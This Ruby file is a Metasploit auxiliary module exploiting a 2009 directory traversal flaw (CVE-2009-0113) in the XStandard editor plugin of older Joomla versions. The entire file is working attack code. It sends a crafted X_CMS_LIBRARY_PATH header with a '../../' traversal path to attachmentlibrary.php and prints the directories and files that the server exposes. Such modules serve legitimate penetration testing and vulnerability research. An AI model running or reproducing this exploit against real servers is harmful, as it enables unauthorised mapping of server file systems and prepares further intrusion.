require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Joomla "X_CMS_LIBRARY_PATH" Directory Traversal Vulnerability',
			'Description'    => %q{
					This module exploits an "X_CMS_LIBRARY_PATH" Directory Traversal Vulnerability in the
					Joomla CMS versions < 1.5.9
			},
			'Author'         => 'Janek Vind "waraxe" <come2waraxe[at]yahoo.com>',
			'License'        => MSF_LICENSE,
			'Version'        => '0.90',
			'References'     =>
				[
					['BID', '33143'],
					['CVE', '2009-0113'],
					['MIL', '7691'],
					['URL', 'http://developer.joomla.org/security/news/288-20090102-core-plgxstandard-directory-traversal.html']
				],
			'DisclosureDate' => 'Jan 09 2009'))

			register_options(
				[
					OptString.new('URI', [false, 'Path to Joomla', '']),
					OptString.new('FOLDER', [true, 'Folder to explore', '../../']),
				], self.class)
			
	end

	def run

		target_uri = '/' + datastore['URI'] + '/plugins/editors/xstandard/attachmentlibrary.php'
		target_uri = target_uri.gsub(/\/{2,}/, '/')
		target_folder = datastore['FOLDER']
		target_folder = target_folder.gsub(/\/{2,}/, '/')
		print_status("URI: #{target_uri}")
		print_status("Folder: #{target_folder}")
		
		res = send_request_cgi({
			'uri'     => target_uri,
			'method'  => 'GET',
			'headers' =>
			{
				'Connection' => 'Close',
				'X_CMS_LIBRARY_PATH' => target_folder
			}
		}, 30)

		if (res)
			print_status("Server returned: #{res.code} #{res.message}")
			
			if(res.code == 200)
				if(res.body.include? '<library>')
					
					found = false
					
					arr_dirs = res.body.scan(/<baseURL>([^<]+)<\/baseURL>/m)
					if(arr_dirs.length > 0)
						found = true
						out = "\nDirectories:\n====================\n"
						arr_dirs.each do |arr2|
							dname = Rex::Text.uri_decode(arr2[0])
							dname = dname.gsub('//','/')
							dname = dname.gsub('images/stories/','')
							out += dname + "\n"
						end
					end
					
					arr_files = res.body.scan(/<value>([^<]+\.[^<]{3,4})<\/value>/m)
					if(arr_files.length > 0)
						found = true
						out += "\nFiles:\n====================\n"
						arr_files.each do |arr2|
							dname = Rex::Text.uri_decode(arr2[0])
							dname = dname.gsub('//','/')
							dname = dname.gsub('images/stories/','')
							out += dname + "\n"
						end
					end
					
					if(found)
						print_status(out)
					else
						print_status('No directories or files in response')
					end
				else
					print_error('Invalid response, exploit failed')
				end
			else
				print_error('Invalid response code, exploit failed')
			end
		else
			print_error('No response from the server')
		end
		
	end
	
end